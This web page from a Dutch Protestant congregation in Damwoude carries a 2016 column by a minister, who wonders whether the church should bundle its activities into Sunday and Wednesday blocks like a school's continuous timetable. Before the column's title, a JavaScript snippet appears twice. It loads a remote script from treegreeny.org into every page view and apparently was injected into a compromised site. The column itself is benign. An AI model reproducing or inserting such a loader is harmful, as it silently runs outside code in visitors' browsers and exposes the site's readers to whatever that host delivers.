;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Continurooster - PKN Damwâld

Continurooster

Gepubliceerd op: vrijdag 30 september 2016

Onze kinderen zitten op de basisschool en van de school kregen we onlangs deze vraag voorgelegd: bent u voor of tegen de invoering van een continurooster? Het continurooster houdt in dat de kinderen ’s ochtends naar school gaan, tussen de middag op school blijven eten en ’s middags vanaf 14.15u vrij zijn. De middagpauze is veel korter en de schooldag bestaat uit één geheel, in plaats van twee delen.
Een continurooster. Zou dat voor de kerk ook wat zijn?
Onze kerkelijke praktijk in Damwoude laat een grote versnippering zien. Op zondag twee, soms zelfs drie kerkdiensten en bijeenkomsten. Op bijna iedere avond van de week wel een vergadering of activiteit. En tussendoor telkens weer naar huis om vervolgens te haasten om weer op tijd te zijn. Met een continurooster zou dat anders kunnen.
Op zondag gaan vanaf 9.00u de deuren van de kerk open. Eerst is er gelegenheid om lekker rustig binnen te komen. Kopje koffie, krantje, eventueel voor de actievelingen een ochtendwandeling. Om 10.30u begint dan een kerkdienst, een bijeenkomst in de grote zaal. Voor bijvoorbeeld de kinderen en de jongeren kan er om de bijeenkomst heen een verwerking van het thema georganiseerd worden.
Na de kerkdienst hoeven we niet te haasten, want we blijven in de kerk eten. Het begin van de middag biedt de gelegenheid om met diverse groepen even bij elkaar te zitten om dingen te regelen of door te praten over belangrijke zaken die spelen. Om 14.30u volgt een korte bijeenkomst waarmee we de kerkdag afsluiten. Vanaf 15.00u is iedereen vrij.
Dit patroon herhalen we op woensdag. Weer een continurooster. Vanaf 14.30u kun je in de kerk terecht. Er is een gespreksgroep, maar ook een kinderclub en een sportgroep. Om 18.00u wordt er gezamenlijk gegeten, zodat ook de mensen uit hun werk kunnen aansluiten. ’s Avonds wordt er vergaderd, diverse zaken met elkaar besproken en gedeeld (voor zover dat nog niet tijdens de maaltijd is gebeurd). De jongeren krijgen coaching in de geloofsleer en – praktijk. Om 21.00u wordt de kerkdag afgesloten en daarna is iedereen vrij.
Op maandag, dinsdag, donderdag, vrijdag en zaterdag zijn er geen activiteiten van de kerk. Dan is er alle gelegenheid om jezelf op andere plaatsen dienstbaar te maken. Natuurlijk is de kerk dan wel open voor wie even de rust wil zoeken.
Een continurooster. De kerkelijke activiteiten bij elkaar gebracht in twee overzichtelijke blokken. Je bent iets langer van huis op zondag en woensdag. Daar staat meer ononderbroken vrije tijd tegenover.
Het continurooster. Zou het wat voor de kerk zijn? Bent u voor of tegen?

Columnist:Ds. G. Timmer

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns